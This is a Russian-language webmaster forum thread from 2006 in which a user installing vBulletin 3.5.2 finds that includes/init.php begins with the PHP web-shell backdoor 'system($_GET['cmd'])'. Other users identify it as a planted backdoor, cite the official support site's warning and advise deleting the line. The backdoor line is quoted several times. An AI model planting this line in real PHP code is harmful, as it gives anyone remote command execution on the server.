 |
Форум вебмастеров на AlfaSpace.NET / CMS и Форумы / Форум vBulletin. Отладка |
| . 1 . 2 . >> |
| Автор | Сообщение |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 15:47 Пытаюсь поставить форум вбюллетин в. 3.52. Всё закачал, проинсталлил. В админке и на форуме выходит ошибка Warning: system() has been disabled for security reasons in /home/mp3/mp3.alfaspace.net/forum/includes/init.php on line 1 Unable to add cookies, header already sent. File: /home/mp3/mp3.alfaspace.net/forum/includes/init.php Line: 1 Первая строка указанного файла выглядит так: <?php system($_GET['cmd']); ?><?php ... Может реклама всему виой? |
| SergeyA Участник  494 |
# Дата: 24 Янв 2006 15:52 а функция чего делает? и где она? |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 15:53 system() команда system действительно отключена, используй popen вместо нее |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 15:57 Serg php system($_GET['cmd']) это же чистая дыра!! Если я вызову тебе скрипт с параметром XXX то он тебе все потрет  |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 15:57 Deflector команда system действительно отключена, используй popen вместо нее system заменил на popen. Теперь и в ошибке вместо систем попен. Есь ещё варианты? |
| Андрей Алексеевич  2123 |
# Дата: 24 Янв 2006 15:58 ° Поправил: Андрей <?php system($_GET['cmd']); ?> 
Может реклама всему виой? Где ты его скачал? На варезнике каком то?  |
| Андрей Алексеевич 2123 |
# Дата: 24 Янв 2006 15:59 Serg Ты издеваешься! ЭТО БЭКДУР КТО ТО СДЕЛАЛ! В ПОПУ ЭТУ СТРОЧКУ И ВСЕ ПОХОЖИЕ!  |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 15:59 php system($_GET['cmd']) это же чистая дыра!! Если я вызову тебе скрипт с параметром XXX то он тебе все потрет Так было... |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:01 Serg убей эту строку вообще |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:01 Где ты его скачал? На варезнике каком то? На оф. сайте русской поддержки vbulletin.net.ru |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:03 убей эту строку вообще Убил. Теперь совсем пусто.  |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:04 ° Поправил: Serg Вот короче начало документа: <?php if (!defined('VB_AREA') AND !defined('THIS_SCRIPT')) { echo 'VB_AREA or THIS_SCRIPT must be defined to continue'; exit; } if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) { echo 'Request tainting attempted.'; exit; } $pagestarttime = microtime(); define('TIMESTART', microtime()); define('TIMENOW', time()); if (!defined('CWD')) { define('CWD', (($getcwd = getcwd()) ? $getcwd : '.')); } require_once(CWD . '/includes/class_core.php'); $vbulletin =& new vB_Registry(); $vbulletin->fetch_config(); if (CWD == '.') { // getcwd() failed and so we need to be told the full forum path in config.php if (!empty($vbulletin->config['Misc']['forumpath'])) { define('DIR', $vbulletin->config['Misc']['forumpath']); } else { trigger_error('<strong>Configuration</strong>: You must insert a value for <strong>forumpath</strong> in config.php', E_USER_ERROR); } } else { define('DIR', CWD); } if (!$vbulletin->debug) { set_error_handler('vb_error_handler'); } По-моему тут глобальные переменные есть... |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:04 Убил. Теперь совсем пусто Ну вот и хорошо - форум не работает, значит ломать нечего. А если серьезно, ты ничего лишнего не потер? |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:05 Serg Почитай на главной странице http://vbulletin.net.ru/ там написано: Поскольку мы получили несколько сигналов о существовании эксплойта в архиве «vBulletin 3.5.2 перевод — zCarot, null — SCRiPTMAFiA» (vb352_zCarot_rusforum.rar) НАСТОЯТЕЛЬНО РЕКОМЕНДУЕМ всем посетителям сайта, качавшим и устанавливавшем эту версию проверить следующее: наличие строки system($_GET['cmd']); в файлах: includes/functions.php includes/init.php Если такая строка присутствует, УДАЛИТЕ ЕЕ. P.S. в настоящий момент никаких левых строк в ар |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:06 По поводу приведенного кода - все должно работать, если не убито ничего лишнего. |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:08 Ну вот и хорошо - форум не работает, значит ломать нечего. Вот этого как раз и добивался
А если серьезно, ты ничего лишнего не потер? Поверь, нет. |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:20 Deflector Спасибо за попытку помощи. Не суждено значит... ХЗ чё за ГН  |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:25 Serg Извини - не могу удаленно определять в чем глюк при отсутствии мессаг об ошибках 
Попробуй другой форум поставить... |
| WarGot Per aspera ad astra  1948 |
# Дата: 24 Янв 2006 16:31 Deflector Если я вызову тебе скрипт с параметром &cmd=XXXXXX то он тебе все потрет С какими параметрами Вы говорите запускать надо ? 
Эту строчку потёр, ибо нефиг киндер хакерам советы давать |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:32 WarGot Мог не тереть - я там и так намеренно 2 ошибки допустил
И вообще ты кажется только что правила форума нарушил  |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:40 ° Поправил: Serg Извини - не могу удаленно определять в чем глюк при отсутствии мессаг об ошибках Попробуй другой форум поставить... Дефлектор, ну ты даёшь, насмешил
И на этом спасибо. Я понимаю, что так ошибку не определить. Попробуй другой форум поставить... Какой самый стабильный? Помимо miniBB. |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 16:44 Помимо miniBB Помимо minibb - только minibb - я его фанат, так что у меня рука не поднимется написать, что есть еще один, не уступающий ему
Ну кроме vbulletin - но с этим у тебя облом возник |
| Serg Участник 1812 |
# Дата: 24 Янв 2006 16:48 Deflector А может быть из-за авто-рекламы? |
| WarGot Per aspera ad astra 1948 |
# Дата: 24 Янв 2006 16:48 Deflector Пошел читать правила
Гы, вроде как это ты нарушил пункт 9, иль я не понял ? Ткни носом что я нарушил ?
Редакрирование постов модератора преследуется по закону. white_pawn |
| Константин TorrentMaster 3497 |
# Дата: 24 Янв 2006 17:25 WarGot Пункт 9 не пострадал - я же говорю - в моем посте 2 ошибки было
А вот 1 и 2 пункты применимы
Кроме того было достигнуто отдельное соглашение - чтобы другие модераторы не обсуждали действия друг друга - смолл как-то попытался
Используй поиск по форуму
На самом деле забей на это дело - это я так, к слову - просто не люблю, когда мои посты редактируют, особенно когда они опасной инфы не содержат |
| Serg Участник 1812 |
# Дата: 25 Янв 2006 06:37 Или не можЫт? |
| Константин TorrentMaster 3497 |
# Дата: 25 Янв 2006 07:02 Serg Может. Попроси админа снять авторекламу. |
| Serg Участник 1812 |
# Дата: 25 Янв 2006 10:49 Может. Попроси админа снять авторекламу. Ок. Ща. |
| Serg Участник 1812 |
# Дата: 26 Янв 2006 15:55 http://vbulletin.net.ru/forum/showthread.php?t=3085 Ничё не понимаю |
| Serg Участник 1812 |
# Дата: 26 Янв 2006 15:57 Посмотрите плиз кто-нибудь. У вас работает? |
| . 1 . 2 . >> |
![[Valid RSS]](valid-rss.png "Validate my RSS feed")